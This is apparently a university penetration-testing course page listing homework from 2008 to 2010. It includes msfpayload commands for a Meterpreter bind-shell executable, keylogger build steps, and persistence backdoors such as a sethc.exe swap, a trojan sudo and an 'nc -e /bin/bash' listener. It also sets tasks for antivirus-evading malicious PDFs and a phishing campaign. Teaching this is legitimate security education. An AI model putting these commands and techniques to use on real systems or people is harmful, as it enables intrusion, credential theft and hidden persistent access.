• Slides


Required Reading




CPAU is an administration tool that allows a lower privileged user to run a higher rights process. The CPAU tool performs this action by embedding higher privileged credentials and specifying the process to run inside of a job file. This ill-designed application is widely deployed by corporations and could possibly be encountered by a penetration tester after gaining access to a corporate desktop. Reverse engineer the isis-cmd.job file and extract the credentials with elevated privileges.

Required Reading


General References

Finding Web Malware Samples

Reversing Web Malware

Developing Persistence Tools

Meterpreter Documentation

If the meterpreter API doesn't natively do what you want it to, try uploading and executing one of Nirsoft's utilities.

You don't have to exploit anything to get a Meterpreter instance running. You can bundle Meterpreter into an executable to double-click and run with the following msfpayload commands:

create payload:

  • ./msfpayload windows/meterpreter/bind_tcp LPORT=4444 X > meterpreter.exe

to listen for connections:

  • ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST= LPORT=4444 E


Fall 2010

The homework for clientside explitation was split into two parts:

1. Profile a department at Poly for a client-side attack

  • What intelligence would you gather and why?
  • Based on the information you gathered, develop a scenario to successfully execute a client-side attack

2. Plugin Detection

  • Create a webpage to detect browser version, 3rd party apps, CLASSIDS, etc...
  • Consider cross-browser functionality
  • Deliver a unique page based on browser/OS

Extra Credit: If you did Dino's ActiveX exploitation midterm question, convert your exploit to a Metasploit module. If you didn't do it, do it any way you can.

Discussed in the post-exploitation class was the xspy keylogger. Students should compile xspy for their machine and run it locally. Try running "su -", sudo, and locking your screen and unlocking it. Did it capture your password?

Compilation instructions:

7cc26e0ea6eea9452f5f5f87afcce595 xspy-1.0c.tgz
tar -zxvf
cd xspy xmkmf; make

If you get NULL error in usleep.c, add the following lines to it:

#ifndef NULL
#define NULL (void *)0
#endif //#ifndef NULL

The homework for the post-exploitation class was to write a persistence script for Windows or Linux that uses two forms of persistence: one user-level and one privilege escalation. For Windows, the script must be written in VB or PowerShell. For Linux, the script can be written in Bash, Perl, Python or Ruby.

For example, on Windows you could:

  • Change the password for Guest and re-enable the account for login
  • Create a vulnerable service so that you can privilege escalate
  • Create a new user
  • Move sethc.exe to sethc.exe.bk and copy cmd.exe to sethc.exe

On Linux, you could:

  • Install SSH keys into a user's home directory
  • Install or make an existing binary setuid root
  • Add a . to the user's path and put a trojan sudo in their home directory
  • Install a version of netcat with the "-e gaping security hole" enabled and start it listening with "nc -l 666 -e /bin/bash"

Fall 2009

Students had three choices for their homework in the client-side exploitation section.

Option 1: Plugin Detection

  • Create a webpage that detects browser version, 3rd party apps, class IDs, etc
  • Consider cross-browser functionality
  • Deliver or exploit or a unique page based on collected information

Option 2: Create and obfuscate MDAC RDS code

  • Try to bypass a network IDS, consider what the signatures are triggering on
  • Code sample available (check presentation, milw0rm, or ask Dean)

Option 3: Malicious PDF

  • Encode/obfuscate a malicious PDF to bypass AV on a host. Test the PDF against VirusTotal. The malicious PDF must remain functionality (open calc.exe)
  • Code sample available (ask Dean)

The homework the post-exploitation section was to write a meterpreter script for which functionality did not already exist.

Fall 2008

Students had two choices for their homework in the client-side exploitation section.

Option 1: Run a Phishing Campaign

  • 1a. Intelligence Gathering
    • Find all e-mail addresses for
    • Find any other domains, URLs, or other info that can be used to improve a phish's success
    • Describe methods, tools and scripts used for this step
  • 1b. Target
    • Develop an e-mail (create a scenario) and link it to malicious site that you create
    • At your landing page, gather the following info: remote IP, plugins, browser, etc...
    • If possible, drop and execute a file on the target

Option 2: Analyze a web-based malware

  • Decode the JS and describe its obfuscation techniques
  • Describe what it does, what bug it exploits, how, etc...
  • Modify the code [payload] to use your own payload.exe

The homework the post-exploitation section was to write a meterpreter script for which functionality did not already exist.